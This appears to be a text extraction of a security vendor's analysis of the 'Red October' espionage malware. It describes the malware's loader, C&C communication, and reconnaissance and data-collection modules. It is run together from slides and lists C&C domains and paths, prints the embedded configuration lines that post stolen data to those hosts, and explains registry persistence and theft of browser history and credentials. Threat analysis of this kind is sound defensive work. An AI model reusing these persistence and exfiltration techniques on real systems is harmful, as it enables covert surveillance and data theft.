24546BB958EDD449408BA1AADDB3DCEB 2011.03.04 11:46:39 (GMT) 2011.03.02 09:45:07 (GMT) 2541C266893A45F393112C6F15C2A0C7 2011.01.13 07:59:02 (GMT) 2010.10.11 14:14:34 (GMT) B0D190A48E749B2688E7A90CE3926E84 2011.03.09 08:58:07 (GMT) 2011.03.03 12:50:46 (GMT) 3E35C7C39BC71BADFE9AD15752C2DDDE 2012.09.06 10:30:38 (GMT) 2011.03.15 07:43:59 (GMT) EBCCD9FC831B168D872F6556B4A42DAC 2011.03.15 08:33:11 (GMT) 2011.03.15 07:43:59 (GMT) 7AAC26EA551EC67882E14C388E436F10 2011.03.15 09:06:51 (GMT) 2011.03.15 07:43:59 (GMT) 5F1D10F7CA9E1B9C301872B1BC4B8A18 2011.05.06 07:58:13 (GMT) 2011.03.15 07:43:59 (GMT) 812FC1780548F0611E3F4105E48E518A 2011.05.26 11:04:38 (GMT) 2011.03.15 07:43:59 (GMT) DC0A5753F9885D0BA71ECEA767F91564 2011.07.20 11:06:28 (GMT) 2011.03.15 07:43:59 (GMT)
  21. 21. D44966B31FC6BAFF97AE23EA53A6DFF0 2011.10.06 14:05:34 (GMT) 2011.03.15 07:43:59 (GMT) 141DC8FD84D985F792DE9747F63C6A4C 2011.03.14 15:00:23 (GMT) 2011.03.03 12:50:46 (GMT) 8CE5E706D956D28F6412C38FC5911DCE 2011.03.09 08:18:38 (GMT) 2011.03.03 12:50:46 (GMT) 0C4D3483AD48A4751E288993388E03D2 2011.03.14 14:49:50 (GMT) 2011.03.03 12:50:46 (GMT) 9BD07F7DC5E26F022FDEA386D35EAC68 2011.03.09 07:46:51 (GMT) 2011.03.03 12:50:46 (GMT) 1754024F9932DC25691CDB90D8FAC632 2011.04.13 05:34:30 (GMT) 2011.03.15 07:43:59 (GMT) 4168EEF52CD458B253EBE62B8DAF75AC 2011.03.14 13:34:01 (GMT) 2011.03.03 12:50:46 (GMT) 2B62D48C9D728C5D9650B39E0119F1B7 2010.11.12 09:29:19 (GMT) 2010.10.11 14:14:34 (GMT) EA74E951111ED2E046B87C0A9241FC25 2012.08.02 05:59:07 (GMT) 2011.03.15 07:43:59 (GMT) 3BE885097DBD3DF03B568D1E248A2E4C 2012.09.13 09:41:13 (GMT) 2011.03.15 07:43:59 (GMT) B952997DD0AB0B58F916AF89A5C3E4BD 2011.04.29 10:02:22 (GMT) 2011.03.15 07:43:59 (GMT) 2216490B1C09BB9B4E07AD05A1552FE9 2012.04.06 11:35:36 (GMT) 2011.03.15 07:43:59 (GMT) DBE4C33F6C482D571305589207A3F910 2011.03.14 14:57:27 (GMT) 2011.03.03 12:50:46 (GMT) 8E88185368C9C2C53014E0BAEFCE3066 2011.03.09 08:05:16 (GMT) 2011.03.03 12:50:46 (GMT)3. Loader moduleKnown file locations:%PROGRAMFILES%Windows NTsvchost.exe %PROGRAMFILES%Windows NTsvclogon.exeThe module is a PE EXE file, compiled with Microsoft Visual Studio 2005.This module is created by the first-stage dropper of the malware, usually from a file containing an exploit.It creates a system event object using name patterns: “WIN_%08X%08X%08X%08X%08X”, where “%08X” parameters are replaced by the hexadecimal value of the file body checksum (SHA1). "SYS_%08X%08X%08X%08X%08X", where “%08X” parameters are replaced by the hexadecimal value of the file name checksum (SHA1).Then, the module checks if it was granted administrative rights and sets corresponding flag, which is used in severalsubroutines.The module generates a CLSID from the value of the SHA1 checksum of the system directory path and the volume serialnumber of the system drive.Then, it tries to read the default value of the following registry key:HKLMSoftwareClassesCLSIDgenerated_CLSID (if it has administrative rights)HKCUSoftwareClassesCLSIDgenerated_CLSID (if it has no administrative rights)It checks the contents of the default key value. This check succeeds if the registry key is not present or its value is equal tothe last DWORD of the file’s SHA1 checksum. Otherwise the check fails and it runs the check again each 3 millisecondsfor 4294967294 times.Then, it sets the default value of the registry key to the hexadecimal representation of the value of the last SHA1’s DWORDand tries to read the registry value “InfoTip” from the same registry key. The registry value is assumed to be a 48-byte
  22. 22. binary buffer. It reads the time value from that buffer and exits if the difference between the recorded time and current timeis less than 3 days.This means that the updated modules can be delivered not sooner than in three days to the same victim. If someone triesto reinfect the system with the same dropper, it refuses to do so within 3 days from last infection. This can also be amechanism to escape from attention of power users or administrators who can run recently opened suspicious applicationagain and monitor its activity.Then, it starts a registry installation thread and proceeds to its main loop.Registry installation threadEvery 100 seconds the module ensures that it has been registered for autorun using one of the registry keys:If launched as administrator, it appends path to its own filename to:HKLMSoftwareMicrosoftWindowsNTCurrentVersionWinlogonUserinitElse, it writes a registry value in:HKCUSoftwareMicrosoftWindowsCurrentVersionRun%autorun key% =”path to itself”Possible Autorun key values that we have observed: Name of the encrypted main module Name of the “Run” registry value fsmgmtio32.msc DotNet32 cfsyn.pcs SdbChk frpdhry.hry Hre32 ime64ex.ncs SrvCC32 io32.ocx Ocx32 lhafd.gcp Lha lsc32i.cmp Lsc32 ocxstate.dat NtNdsc opdocx.gxt Scpsts sccme.hrp Lhrp scprd.hrd Srsf syncls.gxk Mslisht lgdrke.swk Sltrdbe sdlvk.acx Ltsmde wsdktr.ltp Lsrtmpx synhfr.pkc Msdcc scpkrp.gmx Dbxchek rfkscp.pck Cskcmp qsdtlp.rcp Klsmod
  23. 23. Main loopThe module runs a loop with random Sleep() delays, and checks if it can fetch one of the URLs at microsoft.com. Name of the encrypted main module Hostnames fsmgmtio32.msc update.microsoft.com, www.microsoft.com update.microsoft.com, www.microsoft.com, Other support.microsoft.comIf any of the URLs are available, it starts the loader thread with a filename of the main module (see Appendix A) as aparameter. Then, it updates the “InfoTip” registry key with current time value and SHA1 of its filename. It also stores ownProcess ID in that value.The module reads the proxy server settings of Internet Explorer, Firefox, Opera and tries to fetch URLs via proxies whendirect connection is not available.Loader ThreadThe module reads the file that contains the main module, decrypts it using RC4 with a hard-coded key, and thendecompresses it using the Zlib library. Then, it checks that the decompressed buffer contains a PE file and starts the PEloader thread.PE loader ThreadThe module implements its own PE loader. The file that is loaded is expected to be a DLL. After loading and relocating thePE, the module calls its DllMain function twice (DLL_PROCESS_ATTACH, DLL_PROCESS_DETACH) and returns.
  24. 24. 4. Main componentThe file is a PE DLL file, no export symbols, compiled with Microsoft Visual Studio 2005.DllMain functionThe module sets a timer with a callback function to be executed every 900 seconds and starts a Windows message loop.Timer callback functionThe module checks if the computer is connected to the Internet (using InternetGetConnectedState API) and if it isconnected, starts its main thread. HTTP Traffic generated by the main component.Main threadThe module prepares a 98-byte buffer that contains several unique machine identifiers using its system drive’s serialnumber, network adapters’ MAC addresses and Internet Explorer registration ID. The buffer also contains a unique hard-coded hexadecimal string that appears to be a victim or campaign ID and a hard-coded DWORD value.
  25. 25. Then, it sends this buffer to a first available C&C server from a hardcoded list using HTTP POST requests. The moduleexpects to receive an encrypted response packet from the server. It decrypts the packet with a simple XOR algorithm, andexecutes one of the following commands depending on the data contained in the packet: Load the Dll from the packet in memory and execute its DllMain Write the packet to a file in temporary/windows/system directory and execute it using CreateProcess() Load a Dll by specified local path and call its DllMain, or execute a program given its path Write the packet to a file in temporary/windows/system directory Write the contents of the packet to %TEMP%bestcrypt_update.exe and (optional part) %TEMP%bestcrypt_update.dll and execute the EXE fileC&C server usage timelineYear C&C domain names URL 2007 msgenuine.net /cgi-bin/view 2008 msinfoonline.org /cgi-bin/a/slice 2009 microsoftosupdate.com;microsoft-msdn.com;microsoftcheck.com /cgi-bin/ms/check osgenuine.com;wingenuine.com;update-genuine.com /cgi-bin/gen/jau 2010 drivers-update-online.com;drivers-get.com;drivers-check.com /cgi-bin/driver/info genuine-check.com;genuineservicecheck.com;genuineupdate.com /cgi-bin/genuine/a msonlineupdate.com;msonlinecheck.com;msonlineget.com /cgi-bin/online/set os-microsoft-check.com;os-microsoft-update.com;os-microsoft- /cgi- online.com bin/microsoft/dev windowscheckupdate.com;windows- /cgi-bin/win/wcx genuine.com;windowsonlineupdate.com 2011 dll-host-update.com;dll-host-check.com;dll-host.com /cgi-bin/dllhost/ac
  26. 26. genuine-check.com;genuineservicecheck.com;genuineupdate.com /cgi-bin/genuine/a microsoftosupdate.com;microsoft-msdn.com;microsoftcheck.com /cgi-bin/ms/check ms-software-check.com;ms-software-update.com;ms-software- /cgi-bin/software/tau genuine.com nt-windows-online.com;nt-windows-update.com;nt-windows-check.com /cgi-bin/nt/th svchost-check.com;svchost-online.com;svchost-update.com /cgi-bin/svchost/uat2012 csrss-check-new.com;csrss-update-new.com;csrss-upgrade-new.com /cgi-bin/csrss/dfl ms-software-check.com;ms-software-update.com;ms-software- /cgi-bin/software/tau genuine.com nt-windows-online.com;nt-windows-update.com;nt-windows-check.com /cgi-bin/nt/th svchost-check.com;svchost-online.com;svchost-update.com /cgi-bin/svchost/uat wins-driver-check.com;wins-driver-update.com;win-driver-upgrade.com /cgi-bin/ntdriver/tonMain component file names Year File name of the main component2007 netads.dat2008 smartiosys.dbn2009 smartiosys.dbn2010 fsmgmtio32.msc ime64ex.ncs ocxwinsmb.tlb2011 frpdhry.hry ime64ex.ncs io32.ocx lhafd.gcp lsc32i.cmp ocxstate.dat sccme.hrp scprd.hrd2012 klsldr.slr lgdrke.swk lsmpdr.vcs mbdsec.sdx ocxstate.dat opdocx.gxt qsdtlp.rcp rfkscp.pck
  27. 27. scpesc.ecs scpkrp.gmx sdlvk.acx syncls.gxk synhfr.pkc wsdktr.ltpExample of C&C communication session(two bytes of the User ID were removed)  
  28. 28. “Red October”. Detailed Malware Description 2. SecondStage of Attack - SecurelistИсточник: http://www.securelist.com/en/analysis/204792268/Red_October_Detailed_Malware_Description_2_Second_Stage_of_Attack“Red October”. Detailed Malware Description 2. Second Stage of AttackFirst stage of attack 1. Exploits 2. Dropper 3. Loader Module 4. Main componentSecond stage of attack 1. Modules, general overview 2. Recon group 3. Password group 4. Email group 5. USB drive group 6. Keyboard group 7. Persistence group 8. Spreading group 9. Mobile group10. Exfiltration group1. Modules, general overviewModule frameworkThe main component of Sputnik implements a framework for executing the “tasks” that are provided by its C&C servers.Most of the tasks are provided as one-time PE DLL libraries that are received from the server, executed in memory and thenimmediately discarded.Several tasks need to be constantly present, i.e. waiting for the iPhone or Nokia mobile to connect. These tasks are providedas PE EXE files and are installed to the infected machine.Persistent tasks Once a USB drive is connected, search and extract files by mask/format, including deleted files. Deleted files are restored using a built in file system parser Wait for an iPhone or a Nokia phone to be connected. Once connected, retrieve information about the phone, its phone book, contact list, call history, calendar, SMS messages, browsing history Wait for a Windows Mobile phone to be connected. Once connected, infect the phone with a mobile version of the Sputnik main component Wait for a specially crafted Microsoft Office or PDF document and execute a malicious payload embedded in that document, implementing a one-way covert channel of communication that can be used to restore control of the infected machine Record all the keystrokes, make screenshots Execute additional encrypted modules according to a pre-defined schedule
  29. 29. Retrieve e-mail messages and attachments from Microsoft Outlook and from reachable mail servers using previously obtained credentialsOne-time tasks Collect general software and hardware environment information Collect filesystem and network share information, build directory listings, search and retrieve files by mask provided by the C&C server Collect information about installed software, most notably Oracle DB, RAdmin, IM software including Mail.Ru agent, drivers and software for Windows Mobile, Nokia, SonyEricsson, HTC, Android phones, USB drives Extract browsing history from Chrome, Firefox, Internet Explorer, Opera Extract saved passwords for Web sites, FTP servers, mail and IM accounts Extract Windows account hashes, most likely for offline cracking Extract Outlook account information Determine the external IP address of the infected machine Download files from FTP servers that are reachable from the infected machine (including those that are connected to its local network) using previously obtained credentials Write and/or execute arbitrary code provided within the task Perform a network scan, dump configuration data from Cisco devices if available Perform a network scan within a predefined range and replicate to vulnerable machines using the MS08-067 vulnerability Replicate via network using previously obtained administrative credentialsModule Groups Group Descrition name Modules of this group designed to be used during first stage of cyberattack right after initial infiltration. Their main purpose is to collect general information about target system which helps locate and identify the infected machine,Recon estimate potential value of current computer data and define which other modules should be pushed next. Also, these modules collect initial easy-to-get type of information such as browser history, browser cached credentials and FTP client settings. This group of modules is designed to steal credentials from various applications and resources, from Mail.ru AgentPassword (popupal free app from mail.ru) to MS Outlook credentials and Windows account hashes (including cached Windows Domain account hashes). Capable of using low-level and direct disk access to copy protected files. This group serves stealing emails from local MS Outlook storage or remote POP3/IMAP mail server. It’s capable ofEmail dumping full email bodies with headers, saving attachments with predefined file extensions. This group is used to steal files from attached USB devices. It monitors USB device events and starts every time new device is attached. It can copy files from predefined extension list, size and age. This group capable of recognition,USB drive restoration and copying already deleted files of MS Office document formats by using own FAT-based filesystem parser.Keyboard This group is dedicated to recording keystrokes, grabbing text from password input fields and making screencaptures. Current group contains installer and payload code to plant a plugin in popular applications such as MS Office or Adobe Reader. The backdoor code is activated when specially crafted document is opened on target machine. This is used toPersistence regain lost access on a machine in case of unexpected loss of control (C&C server takedown or local malware cleaning). Modules of this group are used to scan for other hosts on the network, fingerprint them and then infect via MS08-067Spreading or a list of stolen admin credentials. A module from this group is capable of dumping Cisco network router configuration via SNMP commands and embedded TFTP server. Mobile group is used to dump all valuable information about locally attached mobile device. It is capable of copyingMobile contact information, calendars, SMS and Emails databases and many other private data. These modules are capable of
  30. 30. checking if a device was jailbroken. While some of other modules work in “offline” mode, collect and store data locally, this group of modules transfers all collected data to the C&C server. Modules of this group are capable of reaching FTP servers, remote network sharesExfiltration as well as local disk drives and copy files from these resources. Unlike Recon data collection modules these modules are designed to run repeatedly and bring only new valuable data.Missing Modules Group Descrition name There are modules that copy data files (such as execution logs) related to current malware family from USB drives.USB However, we haven’t seen a module to infect the USB drives yet. We suspect that this module is capable of infectingInfection removable storage, running arbitrary modules from other groups and save data back to the USB drives.Module comparison table
  31. 31. 2. Recon groupRegConn moduleKnown variants: MD5 Size Compilation date (payload) 5447848f3a5fdaf97c498190ed501620 167,936 bytes October 22nd, 2011SummaryGathers system related information. Records installed and recently run software, related application launch timestamps,enumerates attached usb devices like mobile phones and looks for software from this devices, checks for presence ofcustom enterprise software, maintains unfinished/unreferenced download+execute functionality, sends encrypted collecteddata at one of C&C servers (i.e. nt-windows-online.com;nt-windows-update.com;nt-windows-check.com).This module is a Win32 Dll file. C runtime and several other libs statically linked into the executable with variousoptimizations enabled. All functionality is in DllMain function, no export names defined. Compiled with MS Visual C++ 2005.Sequence of systems monitoring tasks 1. Gathers startup information, select environment variables and values %windir%, %username%, %userdomain%, %computername%)
  32. 32. 2. Opens target directory c:windowsprefetch, records all entries in the directory of applications recently run along with timestamp, i.e.PREFETCH DEFRAG.EXE-273F131E.pf.2012-10-31 18:32:37PREFETCH DUMPBIN.EXE-0751B17C.pf.2012-11-01 23:45:39 Loops through registry, attempts to access and record all recently used application data, i.e.C:Program FilesCommon FilesJavaJava Updatejusched.exe, REG_SZ, Java(TM) Update SchedulerC:Documents and SettingspLocal SettingsApplication DataGoogleUpdateGoogleUpdate.exe, REG_SZ, Google InstallerC:Program FilesMessengermsmsgs.exe, REG_SZ, Windows Messenger Attempts to access and record a set of hardcoded registry keys related to enterprise software. Attempts to access and record related keys and values. Reports on success and failure of related key and value access, i.e.REG ORACLE* CHECK(1) SoftwareOracleSunRayClientInfoAgentDisconnectActions@Default -> REG_SZ:""(1) SoftwareOracleSun RayClientInfoAgentReconnectActions@Default -> REG_SZ:"" Attempts to access and record all registry keys and values related to context menu handlers and related executable pathnames, i.e.Context MENU *shellexContextMenuHandlers7-Zip(1) *shellexContextMenuHandlers7-Zip@Default -> REG_SZ: "{23170F69-40C1-278A-1000-000100020000}"(1) CLSID{23170F69-40C1-278A-1000-000100020000}@Default -> REG_SZ: "7-Zip ShellExtension"(1) CLSID{23170F69-40C1-278A-1000-000100020000}InprocServer32@Default -> REG_SZ: "C:Program Files7-Zip7-zip.dll"(2) CLSID{23170F69-40C1-278A-1000-000100020000}InprocServer32ThreadingModel -> REG_SZ: "Apartment" Attempts to access and record registry keys and values related to auto-start applications enumerated under the HKCU Run key and all HKLMUserinit registry keys, i.e.HKCU Run(1) SOFTWAREMicrosoftWindowsCurrentVersionRunVBoxTray ->REG_SZ: "C:WINDOWSsystem32VBoxTray.exe"(2) SOFTWAREMicrosoftWindowsCurrentVersionRunSunJavaUpdateSched -> REG_SZ: "C:Program FilesCommon FilesJavaJava Updatejusched.exe" Attempts to access and record registry keys and values enabling email and webmail access under HKCUSoftwareVB and VBA Program SettingsWebmailer, MSOffice settings, and HKCUSoftwareMail.ruAgentAgent, i.e.REG_MRA Run(1) SoftwareMail.RuAgentAgent -> REG_SZ: "1" Attempts to access and record registry keys and values related to hardcoded list of attached mobile devices and also general USB devices and mobile synchronization and contact software. Reports on success and failure of related key and value access, i.e.N2 RunERROR: cant make RegOpenKey for SoftwareNokiaPC Suite at 412: 0MSG: The operation completed successfully
  33. 33. Attempts to access and record registry keys and values related to list of all installed software. Reports on success and failure of related key and value access, i.e.REG_SPEC_SSS_B Run(1) SOFTWAREClassesInstallerProducts0B79C053C7D38MEE4AB9A00CB3B5D2472ProductName -> REG_SZ: "WebFldrs XP" Attempts to access and record registry keys and values indicating the presence of Radmin v2.0 remote control software, i.e.Radmin RunERROR: cant make RegOpenKey for SYSTEMRAdminv2.0ServerParameters at 412: 0MSG: The operation completed successfully Attempts to open Firefox prefs.js and profiles.ini configuration files. Attempts to open Opera profile.ini, profile/Opera6.ini configuration files. Reads these files and identifies network proxies for each along with credential information. Retrieves Internet Explorer proxy preferences from the registry. Searches for the following file types in the registry and corresponding handler and attempts to record related data for the following extensions:.str .tte ._ok .ki .tel .tlg .zfc .encrypted .zm9 .dat.crp .pcr .safe .ldf   As a part of the network activity loop, calls GetWindowsDirectoryA, GetDriveTypeA and GetVolumeInformation each time, collects hardware information most likely for unique identification. Attempts to resolve nt-windows-update.com domain name. Following a successful call and return from WS2_32.WSAStartup and prior to WS2_32.gethostbyname, the collected data is encrypted. Attempts to connect to nt-windows-online.com. POSTs encrypted data to nt-windows-online.com/cgi-bin/nt/sk/. If POST to nt-windows-online.com fails, attempts the same process with nt-windows-check.com, nt-windows- update.com domains. If no connections are made, attempts to use configured web browser proxy settings and uses them to connect to the three hard-coded domains listed above. Connects and POSTs the stolen configuration data. Maintains download and execute code. How this functionality is called at runtime is uncertain. There are no references to it at runtime, so it seems like something is missing or unfinished.Hardcoded registry keys:HKCUSoftwareMicrosoftWindowsShellNoRoamMUICacheHKLMSoftwareOracleHKCUSoftwareCITHKCUSoftwareCIT SoftwareHKLMSoftwareHKLMSoftwareBawHKLMSoftwareBaw2HKLMSOFTWAREMicrosoftWindowsCurrentVersionRunHKCR*shellexContextMenuHandlersHKCRCLSIDHKLMSOFTWAREMicrosoftWindows NTCurrentVersionWinlogonHKCUSOFTWAREVB and VBA Program SettingsWebMailer
  34. 34. HKCUSoftwareMicrosoftOffice12.0CommonGeneralHKCUSoftwareMail.RuAgentHKLMSOFTWAREClassesInstallerProductsHKLMSOFTWAREMicrosoftWindowsCurrentVersionSetupHKCUSOFTWAREMicrosoftWindows CE ServicesHKLMSOFTWAREMicrosoftWindows NTCurrentVersionWindowsHKLMSoftwareNokiaHKLMSoftwareHTCHKLMSystemCurrentControlSetControlDeviceClassesHKCRSonyEricsson.PCCompanion.1CLSIDHKLMSystemControlSet001EnumRootWPD0000HKLMSYSTEMCURRENTCONTROLSETENUMUSBHKLMSYSTEMRAdminWnhttp moduleKnown variants: MD5 Compilation date (payload) 1b840c5b45cd015f51010e12938b528a 2012.09.05 07:02:33 (GMT) 65820769534fec10958573d1c8a545a8 2012.09.05 07:02:33 (GMT)SummaryThe file is a PE DLL file without exported functions, compiled with Microsoft Visual Studio 2010. Known samples share onecode section, but contain different payloads in the resource section.All the functionality is implemented in the DllMain function.This module is a plugin to check Internet connectivity and get an external IP address of current system using popular publicservices such as 2ip.ru, myip.ru, smart-ip.net.DllMainThe module collects basic system information such as current computer name, current username, and path to the originalexecutable module where it started from. It creates a unique identifier of current system based on VolumeSerialNumberproperty of the disk where current Windows system is located or a hash of current computer name and ProductID value ofInternet Explorer from HKLMSOFTWAREMicrosoftInternet ExplorerRegistrationProductID. This information is put in thelog file in the first place along with current date and time.This module loads a config/script from local resource AAA and sends out some network requests using standard WinInetAPI. The config/script AAA has the following contents:SetOption(conn_a.D_CONN, [65] "nt-windows-online.com;nt-windows-update.com;nt-windows-check.com")SetOption(conn_a.D_NAME, [15] "/cgi-bin/nt/sk")SetOption(conn_a.D_RPRT, [3] "80")SetOption(conn_a.D_SPRT, [3] "80")SetOption(conn_a.D_USER, [21] "%removed%")SetOption(conn_a.D_MODE, 0x0033)SetOption(conn_a.D_PASS, 0x00)SetOption(conn_a.J_CONN, [65] "nt-windows-online.com;nt-windows-update.com;nt-windows-check.com")SetOption(conn_a.J_NAME, [15] "/cgi-bin/nt/th")SetOption(conn_a.J_USER, [21] "%removed%")SetOption(conn_a.J_RPRT, [3] "80")
  35. 35. SetOption(conn_a.J_SPRT, [3] "80")SetOption(conn_a.J_MODE, 0x0033)SetOption(conn_a.J_PASS, 0x00)SetOption(conn_a.VERSION_ID, [6] "51070") SetOption(conn_a.SEND_DELAY_TIME, [6] "20000")SetOption(conn_a.VER_SESSION_ID, [11] "%removed%") SetOption(http_host, [7] "2ip.ru")SetOption(http_port, [3] "80")SetOption(http_path, 0x002F)SetOption(http_ua, [68] "Mozilla/5.0 (Windows NT 5.1; rv:5.0.1)Gecko/20100101 Firefox/5.0.1")SetOption(http_headers, [177] "Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us;q=0.5,en;q=0.3 Accept-Encoding:gzip, deflate Accept-Charset: utf-8;q=0.7,*;q=0.7")Call(task_http)SetOption(http_host, [12] "www.myip.ru")SetOption(http_port, [3] "80")SetOption(http_path, 0x002F)SetOption(http_ua, [68] "Mozilla/5.0 (Windows NT 5.1; rv:5.0.1)Gecko/20100101 Firefox/5.0.1")SetOption(http_headers, [177] "Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Accept-Charset: utf-8;q=0.7,*;q=0.7")Call(task_http)SetOption(http_host, [13] "smart-ip.net")SetOption(http_port, [3] "80")SetOption(http_path, 0x002F)SetOption(http_ua, [68] "Mozilla/5.0 (Windows NT 5.1; rv:5.0.1)Gecko/20100101 Firefox/5.0.1")SetOption(http_headers, [177] "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Accept-Charset: utf-8;q=0.7,*;q=0.7")Call(task_http)While “conn_a” parameters are used to access C&C server during reporting stage, other parameters which start with "http_"are used to send out http requests. Target hosts as shown above are 1. 2ip.ru 2. www.myip.ru 3. smart-ip.netThe websites are used to get current IP address as it is visible on the Internet. If the machine is behind proxy or NAT router,the IP address might be different from the local one. Interestingly all websites of current module developers choice areobviously owned by Russian-speaking people from former CIS countries, first two seem to be Russian and last one isUkrainian.The module simply sends HTTP GET requests to the root page of the websites and gets the response code from theheaders as well as html/text source of the webpage, which is later uploaded to the C&C.Current module doesnt create any local logs, instead all information is kept in memory, which is later compressed using Zlib1.2.5, encrypted, encoded with Base64 algorithm and submitted to the C&C server.Sysinfo module
  36. 36. Known variants: MD5 Compilation date e36b94cd608e3dfdf82b4e64d1e40681 2012.09.05 09:02:30 (GMT) a2fe73d01fd766584a0c54c971a0448a 2012.09.05 09:02:30 (GMT)The files differ only by few values from resources section (which contains configuration data) – code is identical.This module is a PE DLL, written in C++, compiled with Microsoft Visual Studio 2010.DLL resides only in memory – it does not drop itself or any other executables to the disk.It creates %USERPROFILE%Local SettingsTemptmpXX.tmp file (where XX is randomly generated hex number). Duringthe analysis, the file stayed 0-bytes. Most probably, its created for further data logs.DLL collects a range of information about the computer (including the browsers history). This data is written to the memory,compressed with Zlib deflate() function – which also performs some XOR operations on it – encoded with base64 algorithmand sent by the HTTP POST request to the C&C server.InitializationAfter it is loaded to the memory, malware loads and locks resource BBB:AAA:0000, which contains config information;It gets the information about local system and current process: computer name user name current module name pidThen it creates a separate thread, which contains the main module functionality.Main malware threadFirst, it constructs an internal filename string "@INFOSYSINFO_%u_%s.bin"where %u is equal to 7 and %s is system time – obtained with use of GetLocalTime and SystemTimeToFileTime – in format:"%04u%02u%02u_%02u%02u%02u_%03u"if  FileTimeToSystemTime failed, it uses the default time string:"16010101_000000_000"if wsprintfW failed, it uses the default hardcoded filename:"@INFOSYSINFO_X_00000000_000000_000.txt"Then it reads the configuration from the resources section and builds the structure containing all the necessary information atspecific offsets. This structure is held only in memory.It contains a resource named “AAA” with the following values in it:SetOption(conn_a.D_CONN, [65] "nt-windows-online.com;nt-windows-update.com;nt-windows-check.com")SetOption(conn_a.D_NAME, [15] "/cgi-bin/nt/sk")SetOption(conn_a.D_RPRT, [3] "80")SetOption(conn_a.D_SPRT, [3] "80")
  37. 37. SetOption(conn_a.D_USER, [21] "%removed%")SetOption(conn_a.D_MODE, 0x0033)SetOption(conn_a.D_PASS, 0x00)SetOption(conn_a.J_CONN, [65] "nt-windows-online.com;nt-windows-update.com;nt-windows-check.com")SetOption(conn_a.J_NAME, [15] "/cgi-bin/nt/th")SetOption(conn_a.J_USER, [21] "%removed%")SetOption(conn_a.J_RPRT, [3] "80")SetOption(conn_a.J_SPRT, [3] "80")SetOption(conn_a.J_MODE, 0x0033)SetOption(conn_a.J_PASS, 0x00)SetOption(conn_a.VERSION_ID, [6] "17486")SetOption(conn_a.SEND_DELAY_TIME, [6] "20000")SetOption(conn_a.VER_SESSION_ID, [11] "%removed%")Call(task_sysinfo)Malware main thread calls 2 main subroutines: retrieves a lot of system information, including browsing history, and writes it to the in-memory log takes data from the configuration in resources to connect to the C&C and submit collected dataData collectionMalware collects following information: current file time local time username computer name is admin (if the user has administrative rights) language ansi code package oem code package time zone current module name current directory temp directory path Windows directory path system directory path major OS version minor OS version build number service pack number platform idAdditionally, to obtain default applications for HTTP, HTTPS, HTMLFILE and MAILTO malware uses RegQueryValueEx tocheck following registry keys under HKCRttpshellopencommand HKCRhttpsshellopencommand HKCRhtmfileshellopencommand HKCRmailtoshellopencommand
  38. 38. Following parameters are retrieved for each disk, including optical drives and shared mounts: root path filesystem name volume name drive type volume serial number filesystem flags maximum component length sectors per cluster bytes per sector number of free clusters number of total clusters free bytes available total number of bytes total number of free bytesThen it collects information about local network adapters: Adapter Name Adapter Description Address Length Adapter MAC Address Adapter Index Adapter Type DhcpEnabled CurrentIpAddress IpAddressList GatewayList DhcpServer HaveWins PrimaryWinsServer SecondaryWinsServer LeaseObtained LeaseExpiresThe malware looks for URL history from following browsers:Chrome, Mozilla Firefox, Internet Explorer, Opera1.  Chrome history:Before the malware is performing the SQL queries on the browsers profile-files, it copies the original file into a temp-file.To get the Tempfile path and name it makes use of GetTempPathW and GetTempFileNameW with prefix ”tmp”.The Tempfile will be named like this:tmpXX.tmpWhere XX is a 2-digit number starting from 00.
  39. 39. Malware use following SQL query:SELECT * FROM urlsto extract URLs (with titles, last visited date) from Chrome history database:GoogleChromeUser DataDefaultHistory2. Mozilla history (sub_10015430):Malware use following SQL query:SELECT * FROM moz_placesto extract URLs from Mozilla history database:MozillaFirefoxProfiles%profilename%places.sqliteIn both cases, malware performs SQL related actions with use of functions from embedded SQL library (most probably partsof sqlite3.dll).3. IE history (sub_10014F50):Malware calls CoCreateInstance function with following values:CLSID   3C374A40-BAE4-11CF-BF7D-00AA006946EE Microsoft Url History ServiceRIID     AFA0DC11-C313-11D0-831A-00C04FD5AE38 SID_IUrlHistoryStg2i.e. it uses IUrlHistory interface to search through the history and calls  SHDOCVW!CEnumSTATURL to enumerate URLs.It also makes use of shdocvw.dll which is responsible to get control over IE. The call-adresses are resolved dynamically:
  40. 40. 4. Opera history (sub_10014EB0):Malware gets the Opera folder path and searches it for URLs in files:global_history.dat, global.datAll above subroutines retrieves URL + Title + Last Visited Time and write them to the memory (after the previous data).Also, a DNS resolve is performed on all domain names.This module also calls GetEnvironmentStrings to retrieve all environment variables.It is also interested in current Windows Domain information DomainControllerName DomainControllerAddress DomainControllerAddressType DomainGuid  DomainName DnsForestName Flags   DcSiteName  ClientSiteNameThe malware looks for all running processes and all modules loaded into their address space. For each file it retrievesfollowing values from the version info:
  41. 41. StringFileInfo%04x%04xSpecialBuild StringFileInfo%04x%04xPrivateBuild StringFileInfo%04x%04xProductVersion StringFileInfo%04x%04xProductName StringFileInfo%04x%04xOriginalFilename StringFileInfo%04x%04xLegalTrademarks StringFileInfo%04x%04xLegalCopyright StringFileInfo%04x%04xInternalName StringFileInfo%04x%04xFileVersion StringFileInfo%04x%04xFileDescription StringFileInfo%04x%04xCompanyNameIt looks for installed programs information by enumerating registry key:SOFTWAREMicrosoftWindowsCurrentVersionUninstallFor each entry it retrieves following values: DisplayName DislayVersion DisplayIcon InstallDate UninstallString InstallSource InstallLocationIt retrieves information about installed USB devices.Class GUID is hardcoded and equals:           {A5DCBF10-6530-11D2-901F-00C04FB951ED} → GUID_DEVINTERFACE_USB_DEVICEThe malware checks registry for proxy settings and extracts proxy address somewhere (to some struct or class in thememory) if present:[HKLM|HKCU]SoftwareMicrosoftWindowsCurrentVersionInternet Settings@ProxyServerSoftwareWow6432NodeMicrosoftWindowsCurrentVersionInternetSettings@ProxyServerIt also checks registry for the value MapMenuConfigGrps (not sure what that is), extracts the data and write it somewhere:[HKLM|HKCU]SoftwareMicrosoftWindowsCurrentVersionExplorerAdvanced@MapMenuConfigGrpsSoftwareWow6432NodeMicrosoftWindowsCurrentVersionExplorerAdvanced@MapMenuConfigGrpsIt checks Opera config files for proxy server and other server settings.In files opera6.ini or operaprefs.ini it looks for the following strings:SOCKS server
